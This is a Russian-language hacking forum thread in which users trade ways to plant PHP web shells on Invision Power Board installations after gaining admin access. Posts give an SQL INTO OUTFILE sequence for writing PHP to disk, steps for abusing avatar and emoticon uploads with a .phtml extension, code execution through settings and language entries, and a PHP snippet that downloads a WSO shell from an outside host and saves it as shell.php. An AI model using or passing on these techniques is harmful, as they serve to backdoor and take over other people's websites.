Форумы Заливка шелла в Ipb 2.0.*

Discussion in 'Уязвимости CMS/форумов' started by GreenBear, 9 Dec 2005.

  1. Dimazzz

    Dimazzz Elder - Старейшина

    Joined:
    22 Nov 2005
    Messages:
    172
    Likes Received:
    19
    Reputations:
    1
    Проблема такая!

    Имею доступ к админке IPB 2.1.6
    но не могу залить шелл ни через атачи (меняет разрешение и PHP не выполняется наверно потомучто в папку upload)

    также немогу через смайлы =( нет доступа

    Какие есть еще варианты залить шелл??
     
  2. qPhoenix

    qPhoenix Banned

    Joined:
    15 Dec 2005
    Messages:
    87
    Likes Received:
    50
    Reputations:
    8
    Можно через мускуль...

    к примеру:

    CREATE TABLE `ibf_shell` (`shl` TEXT NOT NULL) TYPE = MYISAM ;
    INSERT INTO `ibf_shell` ( `shl` ) VALUES (`пхп-код`);
    SELECT `shl` FROM `ibf_shell` INTO OUTFILE `путь/имяфайла.php`
    DROP TABLE `ibf_shell`
     
  3. SanyaX

    SanyaX .::Club Life::.

    Joined:
    28 Jan 2005
    Messages:
    936
    Likes Received:
    396
    Reputations:
    261
    Для всех чтоыб не было проблемм с заливкой шеллов.
    В версиях 1.*-2.0.* шелл заливаеться через смайлы.
    Потом просто заходим по такому пути как залили http://www.site.pru/patch_forum/html/emoticons/name_shell.php.
    В версиях 2.1.* шелл заливаеться через аватары.
    Предварительно берём добавляем в типы файлов расшифрение .phtml и ставим mime тип application/octet-stream , следовательно там же указываем разрешение загрузку аватар и фотографий.
    Потом добавляем в профилях пользователей заливка расшифрений .phtml и размер любой ( чем больше тем лучше).
    Потом спокойно заливаем шелл и в свойствах смотрим путь до шелла.
    Причины почему шелл не залился: Стоят права на папки avatars или html/emoticons, стоит safe-mod.
     
  4. Dimazzz

    Dimazzz Elder - Старейшина

    Joined:
    22 Nov 2005
    Messages:
    172
    Likes Received:
    19
    Reputations:
    1
    3 раз повторяю =) это версия 2.1.6 и через смайлы там в любом случае неплучится так как пра нехватает.
    А второй вариан не прокатывает так как после запуска шелла выдает его исходный код, не вы выполняются сценарии в этои папке Uploads
     
  5. SanyaX

    SanyaX .::Club Life::.

    Joined:
    28 Jan 2005
    Messages:
    936
    Likes Received:
    396
    Reputations:
    261
    ТЫ что чушь гонишь? Я тебе про аватары написал ДЛЯ 2.1.6. причём тут папка uploads?? Шелл грузиться в аватары + расширенеи надо .phtml. Вообщем в посте выше я всё описал. Читать надо внимательней.
     
    1 person likes this.
  6. navigat0r

    navigat0r Member

    Joined:
    15 Mar 2009
    Messages:
    83
    Likes Received:
    54
    Reputations:
    -2
    имеется IP.Board v2.3.5
    но не могу залить шелл через атачи
    также немогу через смайлы
    пробывал через стили, тоже не выходит
    может кто знает есчо способ??
     
  7. warlok

    warlok Elder - Старейшина

    Joined:
    17 Feb 2008
    Messages:
    328
    Likes Received:
    142
    Reputations:
    81
    navigat0r там возможно произвольное выполнение php кода , когда добовляеш системную настройку.
    Воть нашол у себя, думаю должен понять ;)
     
    #27 warlok, 30 Apr 2009
    Last edited: 30 Apr 2009
    5 people like this.
  8. navigat0r

    navigat0r Member

    Joined:
    15 Mar 2009
    Messages:
    83
    Likes Received:
    54
    Reputations:
    -2
    делал также как и в видео, мне пишет что страница не найдена.МОжет оно в другое место сохранило?Как узнать куда сохраняет?
    $data=implode('',file('http://navigat0r.kilu.de/shell/wso.txt'));
    $fp=fopen('./shell.php','wb');
    fputs($fp,$data);
    fclose($fp);
    правильно я написал??
     
  9. navigat0r

    navigat0r Member

    Joined:
    15 Mar 2009
    Messages:
    83
    Likes Received:
    54
    Reputations:
    -2
    короче в этой админке так не катит.Пробывал в других, работает.Тут наверно куда-то в др место сохраняет.Чё можно есчо придумать?
     
  10. Live777

    Live777 New Member

    Joined:
    23 May 2011
    Messages:
    28
    Likes Received:
    0
    Reputations:
    0
    Парни в чем проблема таже трабла ,уже что только не испытал , при попытке вывести шелл , выводит в исходном коде , достало ).
     
  11. boortyhuhtyu

    boortyhuhtyu Member

    Joined:
    2 Feb 2011
    Messages:
    727
    Likes Received:
    26
    Reputations:
    -6
    например:надо в шеле убрать <?php, и ?> и залить на фрих в .txt, и в админке,в languages прописать ваш код.
     
  12. Партнёр

    Joined:
    7 Sep 2010
    Messages:
    224
    Likes Received:
    67
    Reputations:
    1
    весь шелл ? залей шелл в другое место